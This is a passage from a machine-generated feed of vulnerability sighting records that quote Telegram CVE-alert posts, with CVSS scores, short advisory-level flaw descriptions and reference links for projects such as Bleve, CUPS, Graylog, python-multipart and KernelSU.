CVSS Score: 6.2 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N)\n\ud83d\udd39 Description: Bleve is a text indexing library for go. Bleve includes HTTP utilities under bleve/http package, that are used by its sample application. These HTTP methods pave way for exploitation of a node\u2019s filesystem where the bleve index resides, if the user has used bleve\u2019s own HTTP (bleve/http) handlers for exposing the access to the indexes. For instance, the CreateIndexHandler (`http/index_create.go`) and DeleteIndexHandler (`http/index_delete.go`) enable an attacker to create a bleve index (directory structure) anywhere where the user running the server has the write permissions and to delete recursively any directory owned by the same user account. Users who have used the bleve/http package for exposing access to bleve index without the explicit \nhandling for the Role Based Access Controls(RBAC) of the index assets would be impacted by this issue. Version 2.5.0 relocated the `http/` dir used _only_ by bleve-explorer to `blevesearch/bleve-explorer`, thereby addressing the issue. However, the http package is purely intended to be used for demonstration purposes. Bleve was never designed handle the RBACs, nor it was ever advertised to be used in that way. The collaborators of this project have decided to stay away from adding any authentication or authorization to bleve project at the moment. The bleve/http package is mainly for demonstration purposes and it lacks exhaustive validation of the user inputs as well as any authentication and authorization measures. It is recommended to not use bleve/http in production use cases.\n\ud83d\udccf Published: 2022-06-01T19:45:12.000Z\n\ud83d\udccf Modified: 2025-05-08T13:44:47.369Z\n\ud83d\udd17 References:\n1. https://github.com/blevesearch/bleve/security/advisories/GHSA-9w9f-6mg8-jp7w\n2. https://github.com/blevesearch/bleve/commit/1c7509d6a17d36f265c90b4e8f4e3a3182fe79ff\n3. https://github.com/blevesearch/bleve/commit/af9e3111dadfedf9d30f0448506b4a57fecc8550", "creation_timestamp": "2025-05-08T14:23:27.000000Z"}, {"uuid": "0902f844-d3a4-4801-b68f-1d6755fb7013", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-MCFQ-8RX7-W25V", "type": "published-proof-of-concept", "source": "Telegram/lPGIWg_tQcs4RDQrNkGM74AEu7FEWLIcUMs54pp3qHTSOJE", "content": "", "creation_timestamp": "2026-04-18T01:18:19.000000Z"}, {"uuid": "164ff617-c728-492a-88b7-81e0ad468a50", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:4568", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/15835", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-32050\n\ud83d\udd25 CVSS Score: 5.9 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A flaw was found in libsoup. The libsoup append_param_quoted() function may contain an overflow bug resulting in a buffer under-read.\n\ud83d\udccf Published: 2025-04-03T13:36:29.141Z\n\ud83d\udccf Modified: 2025-05-09T20:16:05.822Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:4440\n2. https://access.redhat.com/errata/RHSA-2025:4508\n3. https://access.redhat.com/errata/RHSA-2025:4560\n4. https://access.redhat.com/errata/RHSA-2025:4568\n5. https://access.redhat.com/security/cve/CVE-2025-32050\n6. https://bugzilla.redhat.com/show_bug.cgi?id=2357067", "creation_timestamp": "2025-05-09T20:26:07.000000Z"}, {"uuid": "76b71336-a860-4f0b-a680-5987da40b898", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6W4M-2XHG-2658", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/15542", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-37454\n\ud83d\udd25 CVSS Score: N/A\n\ud83d\udd39 Description: The Keccak XKCP SHA-3 reference implementation before fdc6fef has an integer overflow and resultant buffer overflow that allows attackers to execute arbitrary code or eliminate expected cryptographic properties. This occurs in the sponge function interface.\n\ud83d\udccf Published: 2022-10-21T00:00:00.000Z\n\ud83d\udccf Modified: 2025-05-08T15:03:28.946Z\n\ud83d\udd17 References:\n1. https://csrc.nist.gov/projects/hash-functions/sha-3-project\n2. https://mouha.be/sha-3-buffer-overflow/\n3. https://news.ycombinator.com/item?id=33281106\n4. https://github.com/XKCP/XKCP/security/advisories/GHSA-6w4m-2xhg-2658\n5. https://lists.debian.org/debian-lts-announce/2022/10/msg00041.html\n6. https://lists.debian.org/debian-lts-announce/2022/11/msg00000.html\n7. https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CMIEXLMTW5GO36HTFFWIPB3OHZXCT3G4/\n8. https://www.debian.org/security/2022/dsa-5267\n9. https://www.debian.org/security/2022/dsa-5269\n10. https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/3ALQ6BDDPX5HU5YBQOBMDVAA2TSGDKIJ/\n11. https://eprint.iacr.org/2023/331\n12. https://news.ycombinator.com/item?id=35050307\n13. https://security.gentoo.org/glsa/202305-02", "creation_timestamp": "2025-05-08T15:24:38.000000Z"}, {"uuid": "ae8b52ad-9da7-49bb-b121-41be98889d6a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-R4PG-VG54-WXX4", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/15558", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-12401\n\ud83d\udd25 CVSS Score: 4.4 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A flaw was found in the cert-manager package. This flaw allows an attacker who can modify PEM data that the cert-manager reads, for example, in a Secret resource, to use large amounts of CPU in the cert-manager controller pod to effectively create a denial-of-service (DoS) vector for the cert-manager in the cluster.\n\ud83d\udccf Published: 2024-12-12T09:06:03.612Z\n\ud83d\udccf Modified: 2025-05-08T15:59:14.670Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/security/cve/CVE-2024-12401\n2. https://bugzilla.redhat.com/show_bug.cgi?id=2327929\n3. https://github.com/cert-manager/cert-manager/pull/7400\n4. https://github.com/cert-manager/cert-manager/pull/7401\n5. https://github.com/cert-manager/cert-manager/pull/7402\n6. https://github.com/cert-manager/cert-manager/pull/7403\n7. https://github.com/cert-manager/cert-manager/security/advisories/GHSA-r4pg-vg54-wxx4\n8. https://go.dev/issue/50116", "creation_timestamp": "2025-05-08T16:23:57.000000Z"}, {"uuid": "3605fde6-589a-4b6c-a7a8-ffb21c51b2a0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8CWR-X83M-MH9X", "type": "published-proof-of-concept", "source": "Telegram/41gIjnqleUG-c7q5H5vmUlb-p3i15u65_SeajvrPdO-zEo4", "content": "", "creation_timestamp": "2026-04-18T01:18:44.000000Z"}, {"uuid": "7d0f5d84-d0a0-4aaf-96b5-3a61a70bc555", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RJ88-6MR5-RCW8", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/15564", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-47177\n\ud83d\udd25 CVSS Score: 9.1 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: CUPS is a standards-based, open-source printing system, and cups-filters provides backends, filters, and other software for CUPS 2.x to use on non-Mac OS systems. Any value passed to `FoomaticRIPCommandLine` via a PPD file will be executed as a user controlled command. When combined with other logic bugs as described in CVE-2024-47176, this can lead to remote command execution.\n\nThis vulnerability has been disputed by a third party because `FoomaticRIPCommandLine` is functionality that is intended to execute administrator specified code.\n\ud83d\udccf Published: 2024-09-26T21:56:36.661Z\n\ud83d\udccf Modified: 2025-05-08T16:33:14.340Z\n\ud83d\udd17 References:\n1. https://github.com/OpenPrinting/cups-filters/security/advisories/GHSA-p9rh-jxmq-gq47\n2. https://github.com/OpenPrinting/cups-browsed/security/advisories/GHSA-rj88-6mr5-rcw8\n3. https://github.com/OpenPrinting/libcupsfilters/security/advisories/GHSA-w63j-6g73-wmg5\n4. https://github.com/OpenPrinting/libppd/security/advisories/GHSA-7xfx-47qg-grp6\n5. https://bugzilla.suse.com/show_bug.cgi?id=1230931\n6. https://www.cups.org\n7. https://www.evilsocket.net/2024/09/26/Attacking-UNIX-systems-via-CUPS-Part-I", "creation_timestamp": "2025-05-08T17:24:19.000000Z"}, {"uuid": "24481336-f0d8-4ee0-a29f-ecd6b86540c8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7XFX-47QG-GRP6", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/15564", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-47177\n\ud83d\udd25 CVSS Score: 9.1 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: CUPS is a standards-based, open-source printing system, and cups-filters provides backends, filters, and other software for CUPS 2.x to use on non-Mac OS systems. Any value passed to `FoomaticRIPCommandLine` via a PPD file will be executed as a user controlled command. When combined with other logic bugs as described in CVE-2024-47176, this can lead to remote command execution.\n\nThis vulnerability has been disputed by a third party because `FoomaticRIPCommandLine` is functionality that is intended to execute administrator specified code.\n\ud83d\udccf Published: 2024-09-26T21:56:36.661Z\n\ud83d\udccf Modified: 2025-05-08T16:33:14.340Z\n\ud83d\udd17 References:\n1. https://github.com/OpenPrinting/cups-filters/security/advisories/GHSA-p9rh-jxmq-gq47\n2. https://github.com/OpenPrinting/cups-browsed/security/advisories/GHSA-rj88-6mr5-rcw8\n3. https://github.com/OpenPrinting/libcupsfilters/security/advisories/GHSA-w63j-6g73-wmg5\n4. https://github.com/OpenPrinting/libppd/security/advisories/GHSA-7xfx-47qg-grp6\n5. https://bugzilla.suse.com/show_bug.cgi?id=1230931\n6. https://www.cups.org\n7. https://www.evilsocket.net/2024/09/26/Attacking-UNIX-systems-via-CUPS-Part-I", "creation_timestamp": "2025-05-08T17:24:19.000000Z"}, {"uuid": "e35cd1cf-9854-437f-a3a9-6452ae039fd5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-P9RH-JXMQ-GQ47", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/15564", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-47177\n\ud83d\udd25 CVSS Score: 9.1 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: CUPS is a standards-based, open-source printing system, and cups-filters provides backends, filters, and other software for CUPS 2.x to use on non-Mac OS systems. Any value passed to `FoomaticRIPCommandLine` via a PPD file will be executed as a user controlled command. When combined with other logic bugs as described in CVE-2024-47176, this can lead to remote command execution.\n\nThis vulnerability has been disputed by a third party because `FoomaticRIPCommandLine` is functionality that is intended to execute administrator specified code.\n\ud83d\udccf Published: 2024-09-26T21:56:36.661Z\n\ud83d\udccf Modified: 2025-05-08T16:33:14.340Z\n\ud83d\udd17 References:\n1. https://github.com/OpenPrinting/cups-filters/security/advisories/GHSA-p9rh-jxmq-gq47\n2. https://github.com/OpenPrinting/cups-browsed/security/advisories/GHSA-rj88-6mr5-rcw8\n3. https://github.com/OpenPrinting/libcupsfilters/security/advisories/GHSA-w63j-6g73-wmg5\n4. https://github.com/OpenPrinting/libppd/security/advisories/GHSA-7xfx-47qg-grp6\n5. https://bugzilla.suse.com/show_bug.cgi?id=1230931\n6. https://www.cups.org\n7. https://www.evilsocket.net/2024/09/26/Attacking-UNIX-systems-via-CUPS-Part-I", "creation_timestamp": "2025-05-08T17:24:19.000000Z"}, {"uuid": "bc281a78-bbd3-4b73-b500-ccc018c17237", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-W63J-6G73-WMG5", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/15564", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-47177\n\ud83d\udd25 CVSS Score: 9.1 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: CUPS is a standards-based, open-source printing system, and cups-filters provides backends, filters, and other software for CUPS 2.x to use on non-Mac OS systems. Any value passed to `FoomaticRIPCommandLine` via a PPD file will be executed as a user controlled command. When combined with other logic bugs as described in CVE-2024-47176, this can lead to remote command execution.\n\nThis vulnerability has been disputed by a third party because `FoomaticRIPCommandLine` is functionality that is intended to execute administrator specified code.\n\ud83d\udccf Published: 2024-09-26T21:56:36.661Z\n\ud83d\udccf Modified: 2025-05-08T16:33:14.340Z\n\ud83d\udd17 References:\n1. https://github.com/OpenPrinting/cups-filters/security/advisories/GHSA-p9rh-jxmq-gq47\n2. https://github.com/OpenPrinting/cups-browsed/security/advisories/GHSA-rj88-6mr5-rcw8\n3. https://github.com/OpenPrinting/libcupsfilters/security/advisories/GHSA-w63j-6g73-wmg5\n4. https://github.com/OpenPrinting/libppd/security/advisories/GHSA-7xfx-47qg-grp6\n5. https://bugzilla.suse.com/show_bug.cgi?id=1230931\n6. https://www.cups.org\n7. https://www.evilsocket.net/2024/09/26/Attacking-UNIX-systems-via-CUPS-Part-I", "creation_timestamp": "2025-05-08T17:24:19.000000Z"}, {"uuid": "50bbb159-8c30-4dff-8ef7-91e42316c041", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-G99W-PRQ5-29C6", "type": "seen", "source": "Telegram/Q64crjFZRAFhidSIvAgPD7j9KS4Pns0gYZhyfeiZ9MDp9II", "content": "", "creation_timestamp": "2026-04-17T21:23:35.000000Z"}, {"uuid": "1bbdc826-a24f-4e9a-8409-c77efa9a2b24", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7JQ3-6J3C-5CM2", "type": "seen", "source": "Telegram/Q64crjFZRAFhidSIvAgPD7j9KS4Pns0gYZhyfeiZ9MDp9II", "content": "", "creation_timestamp": "2026-04-17T21:23:35.000000Z"}, {"uuid": "957ac820-bec4-4fba-8375-9d750115ad97", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-76VF-MPMX-777J", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/15347", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-46827\n\ud83d\udd25 CVSS Score: 8 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: Graylog is a free and open log management platform. Prior to versions 6.0.14, 6.1.10, and 6.2.0, it is possible to obtain user session cookies by submitting an HTML form as part of an Event Definition Remediation Step field. For this attack to succeed, the attacker needs a user account with permissions to create event definitions, while the user must have permissions to view alerts. Additionally, an active Input must be present on the Graylog server that is capable of receiving form data (e.g. a HTTP input, TCP raw or syslog etc). Versions 6.0.14, 6.1.10, and 6.2.0 fix the issue. No known workarounds are available, as long as the relatively rare prerequisites are met.\n\ud83d\udccf Published: 2025-05-07T15:29:31.420Z\n\ud83d\udccf Modified: 2025-05-07T15:50:18.084Z\n\ud83d\udd17 References:\n1. https://github.com/Graylog2/graylog2-server/security/advisories/GHSA-76vf-mpmx-777j", "creation_timestamp": "2025-05-07T16:23:25.000000Z"}, {"uuid": "5bff220c-4fd2-48d9-97dd-4fc610672b02", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7PXC-H3RV-R257", "type": "seen", "source": "Telegram/7C15iqAEcZ5ODFR22IWkRQCDQTDewcZjz-3MN_l57bsxR9g", "content": "", "creation_timestamp": "2026-04-17T21:23:49.000000Z"}, {"uuid": "f081955e-8535-4ada-9602-95b47187a8f1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-M5GR-86J6-99JP", "type": "published-proof-of-concept", "source": "Telegram/3g7V6SV_71PzaXn8Yubvw4Z7qK4NE-jaYcye5068Hc2mjiw", "content": "", "creation_timestamp": "2026-04-17T23:20:15.000000Z"}, {"uuid": "0b427870-3462-4830-92f3-39a5ac7f942e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-92MR-6WPP-27JJ", "type": "published-proof-of-concept", "source": "Telegram/nSRvyMMuDO4LVDIhC_Rx7gx27JwRYoRyOv-3439P5STagmw", "content": "", "creation_timestamp": "2026-04-17T23:20:07.000000Z"}, {"uuid": "a23452be-a9c3-48cd-a17c-fc4486104285", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2JV5-9R88-3W3P", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/15783", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-24762\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: `python-multipart` is a streaming multipart parser for Python. When using form data, `python-multipart` uses a Regular Expression to parse the HTTP `Content-Type` header, including options. An attacker could send a custom-made `Content-Type` option that is very difficult for the RegEx to process, consuming CPU resources and stalling indefinitely (minutes or more) while holding the main event loop. This means that process can't handle any more requests, leading to regular expression denial of service. This vulnerability has been patched in version 0.0.7.\n\ud83d\udccf Published: 2024-02-05T14:33:06.481Z\n\ud83d\udccf Modified: 2025-05-09T16:32:50.015Z\n\ud83d\udd17 References:\n1. https://github.com/Kludex/python-multipart/security/advisories/GHSA-2jv5-9r88-3w3p\n2. https://github.com/Kludex/python-multipart/commit/20f0ef6b4e4caf7d69a667c54dff57fe467109a4\n3. https://github.com/tiangolo/fastapi/security/advisories/GHSA-qf9m-vfgh-m389\n4. https://github.com/encode/starlette/security/advisories/GHSA-93gm-qmq6-w238\n5. https://github.com/andrew-d/python-multipart/blob/d3d16dae4b061c34fe9d3c9081d9800c49fc1f7a/multipart/multipart.py#L72-L74\n6. https://github.com/encode/starlette/commit/13e5c26a27f4903924624736abd6131b2da80cc5\n7. https://github.com/tiangolo/fastapi/commit/9d34ad0ee8a0dfbbcce06f76c2d5d851085024fc\n8. https://github.com/tiangolo/fastapi/releases/tag/0.109.1", "creation_timestamp": "2025-05-09T17:25:46.000000Z"}, {"uuid": "e8a69aec-152f-4d9d-b92f-6f4152d74471", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-QF9M-VFGH-M389", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/15783", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-24762\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: `python-multipart` is a streaming multipart parser for Python. When using form data, `python-multipart` uses a Regular Expression to parse the HTTP `Content-Type` header, including options. An attacker could send a custom-made `Content-Type` option that is very difficult for the RegEx to process, consuming CPU resources and stalling indefinitely (minutes or more) while holding the main event loop. This means that process can't handle any more requests, leading to regular expression denial of service. This vulnerability has been patched in version 0.0.7.\n\ud83d\udccf Published: 2024-02-05T14:33:06.481Z\n\ud83d\udccf Modified: 2025-05-09T16:32:50.015Z\n\ud83d\udd17 References:\n1. https://github.com/Kludex/python-multipart/security/advisories/GHSA-2jv5-9r88-3w3p\n2. https://github.com/Kludex/python-multipart/commit/20f0ef6b4e4caf7d69a667c54dff57fe467109a4\n3. https://github.com/tiangolo/fastapi/security/advisories/GHSA-qf9m-vfgh-m389\n4. https://github.com/encode/starlette/security/advisories/GHSA-93gm-qmq6-w238\n5. https://github.com/andrew-d/python-multipart/blob/d3d16dae4b061c34fe9d3c9081d9800c49fc1f7a/multipart/multipart.py#L72-L74\n6. https://github.com/encode/starlette/commit/13e5c26a27f4903924624736abd6131b2da80cc5\n7. https://github.com/tiangolo/fastapi/commit/9d34ad0ee8a0dfbbcce06f76c2d5d851085024fc\n8. https://github.com/tiangolo/fastapi/releases/tag/0.109.1", "creation_timestamp": "2025-05-09T17:25:46.000000Z"}, {"uuid": "58eb4fed-baea-40d8-a346-4316058fd6fa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-93GM-QMQ6-W238", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/15783", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-24762\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: `python-multipart` is a streaming multipart parser for Python. When using form data, `python-multipart` uses a Regular Expression to parse the HTTP `Content-Type` header, including options. An attacker could send a custom-made `Content-Type` option that is very difficult for the RegEx to process, consuming CPU resources and stalling indefinitely (minutes or more) while holding the main event loop. This means that process can't handle any more requests, leading to regular expression denial of service. This vulnerability has been patched in version 0.0.7.\n\ud83d\udccf Published: 2024-02-05T14:33:06.481Z\n\ud83d\udccf Modified: 2025-05-09T16:32:50.015Z\n\ud83d\udd17 References:\n1. https://github.com/Kludex/python-multipart/security/advisories/GHSA-2jv5-9r88-3w3p\n2. https://github.com/Kludex/python-multipart/commit/20f0ef6b4e4caf7d69a667c54dff57fe467109a4\n3. https://github.com/tiangolo/fastapi/security/advisories/GHSA-qf9m-vfgh-m389\n4. https://github.com/encode/starlette/security/advisories/GHSA-93gm-qmq6-w238\n5. https://github.com/andrew-d/python-multipart/blob/d3d16dae4b061c34fe9d3c9081d9800c49fc1f7a/multipart/multipart.py#L72-L74\n6. https://github.com/encode/starlette/commit/13e5c26a27f4903924624736abd6131b2da80cc5\n7. https://github.com/tiangolo/fastapi/commit/9d34ad0ee8a0dfbbcce06f76c2d5d851085024fc\n8. https://github.com/tiangolo/fastapi/releases/tag/0.109.1", "creation_timestamp": "2025-05-09T17:25:46.000000Z"}, {"uuid": "28e65cfe-296f-4eb3-8e27-29e6fad0182e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8RC5-X54X-5QC4", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/15848", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-49794\n\ud83d\udd25 CVSS Score: 6.7 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: KernelSU is a Kernel-based root solution for Android devices. In versions 0.7.1 and prior, the logic of get apk path in KernelSU kernel module can be bypassed, which causes any malicious apk named `me.weishu.kernelsu` get root permission. If a KernelSU module installed device try to install any not checked apk which package name equal to the official KernelSU Manager, it can take over root privileges on the device. As of time of publication, a patched version is not available.\n\ud83d\udccf Published: 2024-01-02T19:58:56.152Z\n\ud83d\udccf Modified: 2025-05-09T19:49:09.117Z\n\ud83d\udd17 References:\n1. https://github.com/tiann/KernelSU/security/advisories/GHSA-8rc5-x54x-5qc4\n2. https://drive.google.com/file/d/1b9UrmG_co9EJXB_yMBneRArUIR5sTuaN/view?usp=drive_link", "creation_timestamp": "2025-05-09T20:26:25.000000Z"}, {"uuid": "671ecfe7-da7d-494a-978d-326d606817b7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-M3V5-2J5Q-X85W", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/15790", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-23344\n\ud83d\udd25 CVSS Score: 5.3 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N)\n\ud83d\udd39 Description: Tuleap is an Open Source Suite to improve management of software developments and collaboration. Some users might get access to restricted information when a process validates the permissions of multiple users (e.g. mail notifications). This issue has been patched in version 15.4.99.140 of Tuleap Community Edition.\n\ud83d\udccf Published: 2024-02-06T15:58:19.781Z\n\ud83d\udccf Modified: 2025-05-09T16:26:14.004Z\n\ud83d\udd17 References:\n1. https://github.com/Enalean/tuleap/security/advisories/GHSA-m3v5-2j5q-x85w\n2. https://github.com/Enalean/tuleap/commit/0329e21d268510bc00fed707406103edabf10e42\n3. https://tuleap.net/plugins/git/tuleap/tuleap/stable?a=commit&amp;h=0329e21d268510bc00fed707406103edabf10e42\n4. https://tuleap.net/plugins/tracker/?aid=35862", "creation_timestamp": "2025-05-09T17:25:56.000000Z"}, {"uuid": "fb4ab434-50ed-450a-a4b1-682635939c58", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:1413", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/16037", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-12582\n\ud83d\udd25 CVSS Score: 7.1 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:H)\n\ud83d\udd39 Description: A flaw was found in the skupper console,  a read-only interface that renders cluster network, traffic details, and metrics for a network application that a user sets up across a hybrid multi-cloud environment. When the default authentication method is used, a random password is generated for the \"admin\" user and is persisted in either a Kubernetes secret or a podman volume in a plaintext file. This authentication method can be manipulated by an attacker, leading to the reading of any user-readable file in the container filesystem, directly impacting data confidentiality. Additionally, the attacker may induce skupper to read extremely large files into memory, resulting in resource exhaustion and a denial of service attack.\n\ud83d\udccf Published: 2024-12-24T03:31:24.896Z\n\ud83d\udccf Modified: 2025-05-12T20:08:42.332Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:1413\n2. https://access.redhat.com/security/cve/CVE-2024-12582\n3. https://bugzilla.redhat.com/show_bug.cgi?id=2333540", "creation_timestamp": "2025-05-12T20:29:37.000000Z"}, {"uuid": "b50a0561-8b53-4ded-97a9-3a9012ce0ae7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6QXV-XW9J-77PJ", "type": "published-proof-of-concept", "source": "Telegram/41gIjnqleUG-c7q5H5vmUlb-p3i15u65_SeajvrPdO-zEo4", "content": "", "creation_timestamp": "2026-04-18T01:18:44.000000Z"}, {"uuid": "3c17066d-5b8a-4a4d-baf3-363c139cb66b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2932-77F9-62FX", "type": "published-proof-of-concept", "source": "Telegram/41gIjnqleUG-c7q5H5vmUlb-p3i15u65_SeajvrPdO-zEo4", "content": "", "creation_timestamp": "2026-04-18T01:18:44.000000Z"}, {"uuid": "8d4bc743-a424-438d-ac4e-cbf8b84ac7d6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-97XG-VRCQ-254H", "type": "seen", "source": "Telegram/pg0pMMwJv5FTHbXxc3MO00N2B5ehQq9biiv2KNNNK0Va5Yk", "content": "", "creation_timestamp": "2026-04-18T03:16:49.000000Z"}, {"uuid": 